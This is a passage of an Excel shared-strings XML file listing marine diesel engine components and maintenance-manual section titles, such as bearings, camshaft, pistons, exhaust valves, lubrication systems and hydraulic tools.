    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling oil pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Starting air rec. and manometer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil prefilter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil full flow filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil accessories</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HT pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling water thermostats</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>High temp. pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HT Sundries accessories</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LT pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Low temp. valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Low temp. pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LT Sundries accessories</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manometer pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust temperature sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Splash oil sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tacho and proximity sensors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Automatic start of stand-by pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Automatic shutdown of engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for piston and con. rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for fuel v. and fuel pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for Maihak indicator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Special tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dry clean. dev. - turb. cleaning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Table of Content</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0205-0100 Warning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preface Chapter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0220-0100 Introduction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0240-0100 Table Content &amp; Intro</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0505-0100 Warning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0545-0100 Safety Precautions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0535-0100 Safety</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0540-0100 Safety</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>General Description</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0745-0800 Cross Section</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0745-0500 Designations</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0745-0150 Software License</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0745-0100 Main data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0715-0100 Introduction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0760-0301 Maintenance Schedule</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0740-0100 General Description</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1065-0100 Crankcase Relief Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1065-0101 Crankcase Relief Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1065-0200 Holding down Bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1065-0201 Holding down Bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1065-0300 Stay Bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1065-0301 Stay Bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1065-0400 Crankcase Oil Outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1065-0401 Crankcase Oil Outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-1000 - Crankshaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-1030 Crankshaft Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-1040 Thrust Shaft Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0400 Bedplate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-1400 Piston Cooling Arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0630 Frame Box, details</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0710 Cylinder Frame, Detail</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0800 Chain Drive Frame, Upp</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0300 Stay Bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-1000 Crankshaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-1200 Turning Wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-1100 Turning Gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0640 Frame Box Covers</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0200 Hold-down bolts end ch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0500 Top Bracing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-0300 Hydr. Tools for Large</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-0200 Hydr. Tools for En Cho</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-0220 Hydr. Tools f. Holding</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-0210 HD, E.Chock Bolts Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-0600 Frame Box Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-1000 Crankshaft Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-1010 Cranksh. Meas. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-1020 Crankshaft Pin Gauge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-1100 Turning Gear Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1070-1400 Counterweight Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0100 Recipro. Parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0101 Recipro. Parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0200 Crosshead</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0201 Crosshead</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0300 Conneting Rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0301 Conneting Rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0400 Chain</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0401 Chain</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0500 Chain Tightner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0501 Chain Tightner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0600 CaMShaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0601 CaMShaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0700 Exhaust Valve Cam</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0701 Exhaust Valve Cam</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0800 Exh.Valve Roller Guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0801 Exh.Valve Roller Guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0900 Fuel Pump Cam</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-0901 Fuel Pump Cam</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-1000 Fuel Pump Roller Guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-1001 Fuel pump Roller Guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-0600 - CaMShaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0310 Conn. Rod Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0510 Crosshead Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-1400 Chain Drv. Tools Panel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0500 Chn. Tigt. Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-0300 Connecting Rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-0320 ConRod Additional Mass</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-0500 Chain Tightener</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-0400 Chain</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-1420 Chain Drive Guidebars</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0300 ConR and Crossh Tool P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0200 Crosshead Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0315 ConRod Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-1100 Repl Cam on CaMShaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-1101 Repl Cam on CaMShaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0600 CaMShaft Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-1300 Intermediate Wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-1800 Indicator Drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-1030 Gear Drive, Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1465-1031 Gear Drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0305 Conn.Rod+Crossh.Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0520 Crosshead End Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0610 CaMShaft Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-0620 CaMSh.Coup.Hydr.Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1470-1410 Chain Drive Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1865-0100 Axial vibration damper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1865-0101 Axial vibration damper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1865-0200 Moment Compensator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1865-0201 Moment Compensator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1870-0600 AVD hydraulic Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1872-0100 Axial Vibration Damper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1872-0600 Arrangement Fore End</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1872-0150 Axial Vibration Monito</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1870-0100 Axial Vibr.Damper Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1870-0200 Moment Comp. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1870-0300 Tors.Vibr. DamperTools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1870-0400 Segm.Stop+Vibr.D.Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1870-0500 Tuning Wheel Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0100 Exhaust Valve HP Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0101 Exhaust Valve HP Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0200 Exhaust Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0201 Exhaust Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0300 Cylinder Cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0301 Cylinder Cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0400 Piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0401 Piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0500 Piston Rod StuffingBox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0501 Piston Rod StuffingBox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0600 Cylinder Liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0601 Cylinder Liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0700 Cyl. Cover Safety Valv</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2265-0701 Cyl. Cover Safety Valv</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0400 - Piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0420 - Piston Rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0500 - Piston Rod?Stuff.Box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0600 - Cylinder Liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0470 Piston Support Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0430 Piston Guide Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0200 Exh. Valve Panel Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0480 Piston Lifting Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0300 Cyl. Cover Panel Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0310 Cyl. Cover Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0640 Cyl Line Lifting Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0400 Piston Panel Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0300 Cylinder Cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0200 Exh. Valve, upper part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0210 Exh. Valve, lower part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0320 Exh. Valve, Detail</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0240 Exh. Valve Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0610 Cylinder Liner Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0460 Piston Tilting Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0220 Exh. Valve Extra Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0210 Exh. Valve Grinding To</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-1000 Indicator Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0240 Exh Valve Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0230 Exh. Valve Upper, deta</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0320 Cyl Cov Protect Shield</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2245-0100 Cylinder Condition</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2245-0200 Inspection of Nim Exh</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2255-0100 Inspec Thro Scav Ports</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2255-0105 Fact. Influen Cyl Wear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2255-0110 Abrasive Particles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2255-0125 Cyll Oil Feed Rate run</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2255-0130 Cyl Condition Report</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2255-0135 Calc Condensate Amount</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2255-0140 Running-In Load</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0330 Cyl. Cov. Support Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0250 Cyl. Cover Lifting Too</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0440 Piston Rod Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0620 Cyl. Liner Milling Too</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0230 Exh. Valve Extractor T</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0630 Cyl. Liner Honing Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0315 Cyl. Cov. Hydr. Spares</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0245 Exh. Valve Spindle Hyd</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0247 Exh Valve Actuator Hyd</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0320 Cyl. Cover Grind. Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0450 Piston Crown Hydr.Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0490 Cyl.Cov.Safety V.T.Too</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2270-0600 Cyl.Liner Panel Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0100 CaMShaft Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0101 CaMShaft Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0200 Crosshead Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0201 Crosshead Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0300 Crankpin Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0301 Crankpin Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0400 Main Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0401 Main Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0500 Journal Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0501 Journal Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0600 Thrust Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2565-0601 Thrust Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2570-0400 Main Bearing Hydr Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2570-0430 Main Bearing Measuring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2570-0010 Bearing Panel Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0400 Main Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0600 Thrust Brng, Segments</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0650 Thrust Brng, Misc.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0300 Connecting Rod Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0200 Crosshead Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0110 CaMShaft Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2545-0100 Bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2545-0110 Align. of Main Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0100 Main Bearing Thick Sh.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0105 Main Bearing Thin Sh.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0110 Crosshead Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0115 Crankpin Bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0120 Main Bearing Assemblie</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0125 Guide Shoes and Strips</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0130 Thrust Bearing Assembl</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0135 CaMShaft Bearing Assem</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0136 Bearing Wear Monitor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0137 Propel. Shaft Earthing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0140 Insp. Bear. Record. Ob</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0145 Insp. Bear. Locat. Siz</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0150 Accept Crit TiAlu Bear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0155 Insp. Bear. Loc. dmg</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0160 Insp. Bear. Observatio</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0165 inspection Records, Ex</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0170 inspection Records, Bl</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0175 Cranksh. Deflection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0180 Cranksh Deflection Lim</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2555-0185 Check Measurements</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2570-0420 Main Bearing Shell Too</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2570-0020 Segm. Stop. Hydr. Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0100 Chain Wheel on CaMShaf</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2570-0100 CaMSh. Bearing Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2570-0410 Main Bearing Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3065-0600 Cylinder Lubricator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3065-0601 Cylinder Lubricator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3072-0700 Chain Drv. Lubrication</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3072-0600 Cylinder Lubricator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3045-0110 Cylinder Lubrication</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3045-0120 Circulating Oil System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3045-0130 Maint of Circulating O</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3045-0140 Turbocharger Lubricati</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3045-0150 Sep CaMSh Lub Oil Syst</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3045-0160 CaMS Lub Engines Uni-L</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0110 Cyl. Lubr. Oil Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0115 Circ. Oil Sys. Uni-Lub</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0120 Circ. Oil Sys</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0125 Circ. Oil Sys Inside</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0130 Flushing Main Lub Syst</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0135 Cleaning Sys. StuffBox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0140 CaMSh. Lub. P. Uni-Lub</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0145 CaMSh. Lub. P.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0150 Flushing CaMSh. Lube S</t>
